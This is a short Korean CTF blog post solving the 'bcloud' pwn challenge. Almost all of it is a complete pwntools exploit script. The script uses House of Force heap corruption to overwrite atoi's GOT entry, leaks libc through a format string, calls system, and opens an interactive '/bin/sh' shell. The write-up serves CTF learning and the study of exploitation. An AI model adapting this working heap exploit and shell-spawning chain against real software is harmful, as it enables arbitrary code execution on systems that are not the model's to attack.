house of force로 푸는 문제다.
풀다가 이상하게 익스가 안되길래 다른분의 코드를 참고했다.
exploit code
from pwn import *
r = process("./bcloud")
elf = ELF("./bcloud")
print r.recv()
r.send("A"*64)
r.recvuntil("A"*64)
chunk = u32(r.recv(4))
printf_plt = elf.plt['printf']
atoi_got = elf.got['atoi']
topchunk = chunk + 0xd8
house = atoi_got - topchunk - 8 - 4
log.info("exit_got = {}".format(hex(atoi_got)))
log.info("TOP chunk = {}".format(hex(topchunk)))
log.info("house of force = {}".format(hex(house)))
r.recvuntil("Now let's set synchronization options.")
print r.recvuntil("Org:")
r.send("B"*64)
print r.recvuntil("Host:")
r.sendline(p32(0xffffffff)*2)
r.recvuntil(">>")
r.sendline("1")
print r.recvuntil("Input the length of the note content:")
r.sendline(str(house))
print r.recvuntil(">>")
r.sendline("1")
print r.recvuntil("Input the length of the note content:")
r.sendline("8")
print r.recvuntil("Input the content:")
r.sendline("AAAA"+p32(printf_plt))
print r.recv(1024)
r.sendline("%p "*20)
print r.recvuntil("0x10 0xa ")
leaked_addr = int(r.recv(10), 16)
print hex(leaked_addr)
libc_base = leaked_addr - 0x49670
system = libc_base + 0x3ada0
log.info("libc_base = {}".format(hex(libc_base)))
log.info("system = {}".format(hex(system)))
print r.recvuntil(">>")
r.sendline("333")
print r.recvuntil("id:")
r.sendline("1")
print r.recvuntil("content:")
r.send("AAAA"+p32(system))
print r.recv()
r.sendline("/bin/sh\x00")
r.interactive()
'CTF' 카테고리의 다른 글
| QIWICTF 2016 pwn200 (0) | 2019.01.23 |
|---|---|
| SEC-T CTF PingPong (0) | 2018.09.16 |
| Defcon 2014 Babyfirst heap (0) | 2018.08.16 |
| Defcon 2017 smashme (0) | 2018.08.12 |
| Plaid 2014 ezhp (0) | 2018.08.12 |